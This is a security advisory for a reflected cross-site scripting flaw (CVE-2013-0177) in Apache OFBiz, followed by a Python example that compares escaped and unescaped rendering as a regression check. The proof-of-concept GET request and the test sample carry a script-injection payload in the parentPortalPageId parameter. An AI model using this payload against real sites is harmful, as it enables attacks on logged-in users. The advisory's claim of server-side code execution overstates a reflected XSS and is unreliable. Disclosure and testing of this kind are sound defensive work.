Packet Storm, Marcos Garcia, PACKETSTORM:119673
Published: Jan 20, 2013

Apache OFBiz Cross Site Scripting

packetstormsecurity.com

EPSS: 0.002 (Low), percentile 54.7%

`Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz  
Type: Remote  
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)  
CVE: CVE-2013-0177  
Impact: Direct execution of arbitrary code in the context of Webserver user.  
Release Date: 18.01.2013  
  
Summary  
=======  
  
Apache Open For Business (Apache OFBiz) is an open source enterprise  
resource planning (ERP) system. It provides a suite of enterprise  
applications that integrate and automate many of the business processes of  
an enterprise.  
  
Description  
===========  
  
A reflected cross-site scripting vulnerability affects the Screenlet.title and  
Image.alt widget attributes: the content of these two elements is not  
properly escaped.  
  
  
Vendor  
======  
  
Apache OFBiz - http://ofbiz.apache.org/  
  
  
PoC  
===  
  
The resource originally used the HTTP POST method; the request was changed  
to GET to make it easier to exploit.  
For this attack to work, the victim must be authenticated.  
  
Below you can see how the URL is specially crafted to expose the issue:  
  
Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages  
Parameter: parentPortalPageId=[XSS]  
  
GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script> HTTP/1.1  
Host: 10.10.10.14:8443  
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3  
Connection: keep-alive  
Referer: https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037  
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002  
  
  
Solution  
========  
  
10.04.* users should upgrade to 10.04.05  
11.04.01 users should upgrade to 11.04.02  
  
  
Vendor Status  
=============  
  
[08.01.2013] Vulnerability discovered.  
[09.01.2013] Vendor informed.  
[09.01.2013] Vendor replied.  
[12.01.2013] Vendor reveals patch release date.  
[18.01.2013] Public advisory.  
`
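
The escaping failure described for Screenlet.title and Image.alt, shown as an added example that is not code from the advisory or from OFBiz: a request value is placed into a title and an alt attribute with and without output encoding, and the result is parsed to see which tags a browser-like parser would find. The markup, function names and image path are assumptions made for illustration; the sample value is the one in the PoC request above.

```python
from html import escape
from html.parser import HTMLParser

# Constructed stand-ins for the two widget attributes named in the advisory;
# this is not OFBiz's renderer or its markup.
def render_unescaped(title, alt):
    """The 'before' behaviour: request data copied into markup verbatim."""
    return ('<div class="screenlet"><h3 title="%s">%s</h3>'
            '<img src="/images/logo.png" alt="%s"></div>' % (title, title, alt))

def render_escaped(title, alt):
    """Encode for both text and quoted-attribute contexts (&, <, >, ", ')."""
    t, a = escape(title, quote=True), escape(alt, quote=True)
    return ('<div class="screenlet"><h3 title="%s">%s</h3>'
            '<img src="/images/logo.png" alt="%s"></div>' % (t, t, a))

class _Audit(HTMLParser):
    """Collects the tags and attribute values an HTML parser would see."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            self.attrs[(tag, name)] = value

def audit(markup):
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser

def injected_tags(markup, expected=("div", "h3", "img")):
    """Return tags in the parsed output that the template itself never emits."""
    return [t for t in audit(markup).tags if t not in expected]

# The parameter value shown in the advisory's PoC request.
SAMPLE = 'EXAMPLE"><script>alert("xss")</script>'

if __name__ == "__main__":
    print("unescaped:", injected_tags(render_unescaped(SAMPLE, SAMPLE)))
    print("escaped:  ", injected_tags(render_escaped(SAMPLE, SAMPLE)))
```

With encoding applied, the parser sees only the template's own tags and the attribute values decode back to the original string, so the same check can serve as a regression test after upgrading.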
